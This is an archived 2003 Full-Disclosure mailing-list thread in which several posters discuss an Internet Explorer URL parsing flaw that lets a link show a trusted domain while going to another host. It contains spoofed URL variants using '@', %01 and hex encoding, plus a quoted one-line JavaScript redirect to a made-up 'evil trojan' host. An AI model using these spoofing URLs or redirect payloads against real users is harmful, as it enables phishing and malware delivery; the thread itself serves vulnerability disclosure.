[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

To: "Julian HO Thean Swee" <jho@starhub.com>, <full-disclosure@lists.netsys.com>
Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
From: "VeNoMouS" <venom@gen-x.co.nz>
Date: Wed, 10 Dec 2003 18:06:21 +1300

RE: FWD: Internet Explorer URL parsing vulnerabilityok if your using outlook , 
yay for IE being tied in, it translates all the hex for you and those urls do 
work inside of outlook , since IE can translate the hex, where as if u enter it 
manually it dont.


  ----- Original Message ----- 
  From: VeNoMouS 
  To: Julian HO Thean Swee ; full-disclosure@lists.netsys.com 
  Sent: Wednesday, December 10, 2003 6:03 PM
  Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing 
vulnerability


  umm tested this you dont need %01 either btw.

  www.microsoft.com@www.linux.org

  was messing around with some hex stile as well is there a way to call a 
file:// inside a http:// becos the issue with doing the @ trick is it appends 
http:// automaticly, mind you , u could just make it exec some vb code or 
something on a site, just a random idea any way

  and it dont also seem to work if you use hex as well for the full domain ie

  www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67

  nor  www.microsoft.com%40www.linux.org

  where as if you www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 
works






  ----- Original Message ----- 
    From: Julian HO Thean Swee 
    To: 'full-disclosure@lists.netsys.com' 
    Sent: Wednesday, December 10, 2003 4:22 PM
    Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing 
vulnerability


    Hmm, it doesn't seem to work on my browser :) 
    I don't even get transported to any page when i click the button. 
    But then again, i have everything turned off in the internet zone by 
default... 
    (but my submit non-encrypted form data is on) 

    Does it really work then?  it looks like it's using javascript...? 
(location.href) 
    Merry Christmas everyone :) 

      --__--__-- 

      Message: 1 
      Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
      From: S G Masood <sgmasood@yahoo.com> 
      To: full-disclosure@lists.netsys.com 
      Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing 
vulnerability 



      LOL. This is so simple and dangerous, it almost made 
      me laugh and cry at the same time. Most of you will 
      realise why...;D 
      The Paypal, AOL, Visa, Mastercard, et al email 
      scammers will have a harvest of gold this month with 
      lots of zombies falling for this simple technique. 

      ># POC ########## 
      >http://www.zapthedingbat.com/security/ex01/vun1.htm 

      Dont be surprised if your latest download from 
      http://www.microsoft.com turns out to be a trojan! 

      
location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com);
 



      -- 
      S.G.Masood 

      Hyderabad, 
      India 

      PS: One more thing - no scripting required to exploit this. 

      __________________________________ 
      Do you Yahoo!? 
      Free Pop-Up Blocker - Get it now 
      http://companion.yahoo.com/ 



    This email is confidential and privileged.  If you are not the intended 
recipient, you must not view, disseminate, use or copy this email. Kindly 
notify the sender immediately, and delete this email from your system. Thank 
you.

    Please visit our website at www.starhub.com

Prev by Date: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Next by Date: [Full-Disclosure] IE Unpatched Vuln Site?
Previous by thread: RES: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Next by thread: RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
Index(es):
- Date
- Thread